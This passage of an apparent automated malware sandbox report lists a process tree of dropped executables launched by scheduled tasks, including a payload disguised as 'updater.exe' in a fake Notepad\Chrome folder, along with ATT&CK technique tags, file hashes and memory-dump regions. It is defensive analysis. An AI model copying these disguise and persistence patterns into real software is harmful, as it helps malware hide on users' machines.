taskeng.exe {132C3504-9C3D-4DC7-BCAC-7CECC6E5D47A} S-1-5-21-1914912747-3343861975-731272777-1000:TMRJMUQF\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:756
- C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:1696
- C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:1864

C:\Windows\system32\taskeng.exe
taskeng.exe {4DBB7F10-0586-4F9D-ACCE-93CB0C2D1CF5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1984
- C:\Program Files\Notepad\Chrome\updater.exe
  "C:\Program Files\Notepad\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ss31.exe

Filesize
335KB

MD5
a8595a28b5ce6cdd6c6a9cf4625dde72

SHA1
7adef239a7cb84ccdcfbf966b2ba23621ccf437f

SHA256
24de8011fe9daff623a5f32d68aa0da3b6bea64cb7699db5f0d1d695c3cb7a88

SHA512
be54e209199e419a534f636d6e6a0cb061066e466e0f169553868ef30e45a0dccf95bc3a57931c0bece9c2fbab118b56c38256191bf0715bc6b8b27534ae2f2e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJQ2U7YU3ZRTMJGOIOLP.temp

Filesize
7KB

MD5
66abc3179592c55118e0290b4a265d66

SHA1
67d8920698764b4e3a7559600c7d80a8c59950e7

SHA256
79edf419f730005c994280e0fa7ba043487fffd652d675c2d54cbc32959406e9

SHA512
3f742b7bd3bcb5786d7d8e85a4c7ac68bf140034b057a5ab6c3d2838b29b3d23becb72b35b49731ff9e93bbfb875a122e4fc2f34d2aae1c9bf1144893d8bc06c

Download Submit
\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
\Users\Admin\AppData\Local\Temp\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
\Users\Admin\AppData\Local\Temp\oldplayer.exe

Filesize
220KB

MD5
0f59853fb3b3a252e267e204024390c2

SHA1
e692c9d78613e7cac791559f4c8e1f7dd5c74c37

SHA256
dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2

SHA512
1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c

Download Submit
\Users\Admin\AppData\Local\Temp\ss31.exe

Filesize
335KB

MD5
a8595a28b5ce6cdd6c6a9cf4625dde72

SHA1
7adef239a7cb84ccdcfbf966b2ba23621ccf437f

SHA256
24de8011fe9daff623a5f32d68aa0da3b6bea64cb7699db5f0d1d695c3cb7a88

SHA512
be54e209199e419a534f636d6e6a0cb061066e466e0f169553868ef30e45a0dccf95bc3a57931c0bece9c2fbab118b56c38256191bf0715bc6b8b27534ae2f2e

Download Submit
memory/268-71-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/744-126-0x000000000112B000-0x0000000001162000-memory.dmp

Filesize
220KB

Download
memory/744-125-0x0000000001124000-0x0000000001127000-memory.dmp

Filesize
12KB

Download
memory/840-54-0x0000000000A50000-0x0000000000E9A000-memory.dmp

Filesize
4.3MB

Download
memory/936-135-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-134-0x00000000000D0000-0x00000000000F0000-memory.dmp

Filesize
128KB

Download
memory/936-147-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-145-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-142-0x00000000007C0000-0x00000000007E0000-memory.dmp

Filesize
128KB

Download
memory/936-141-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-140-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-138-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/936-136-0x00000000007C0000-0x00000000007E0000-memory.dmp

Filesize
128KB

Download
memory/1100-121-0x0000000019B60000-0x0000000019E42000-memory.dmp

Filesize
2.9MB

Download
memory/1100-122-0x0000000000950000-0x0000000000958000-memory.dmp

Filesize
32KB

Download
memory/1100-123-0x0000000000984000-0x0000000000987000-memory.dmp

Filesize
12KB

Download
memory/1100-124-0x000000000098B000-0x00000000009C2000-memory.dmp

Filesize
220KB

Download
memory/1104-137-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1544-91-0x000000001AFC0000-0x000000001B2A2000-memory.dmp

Filesize
2.9MB

Download
memory/1544-93-0x00000000023C0000-0x0000000002440000-memory.dmp

Filesize
512KB

Download
memory/1544-92-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/1544-94-0x00000000023C0000-0x0000000002440000-memory.dmp

Filesize
512KB

Download
memory/1544-95-0x00000000023C0000-0x0000000002440000-memory.dmp

Filesize
512KB

Download
memory/1704-104-0x000000013FCE0000-0x000000014009D000-memory.dmp

Filesize
3.7MB

Download
memory/1704-83-0x000000013FCE0000-0x000000014009D000-memory.dmp

Filesize
3.7MB

Download
memory/1752-133-0x000000013FDA0000-0x000000014015D000-memory.dmp

Filesize
3.7MB

Download
memory/1752-116-0x000000013FDA0000-0x000000014015D000-memory.dmp

Filesize
3.7MB

Download
memory/1800-109-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/1800-112-0x00000000026CB000-0x0000000002702000-memory.dmp

Filesize
220KB

Download
memory/1800-110-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/1800-111-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download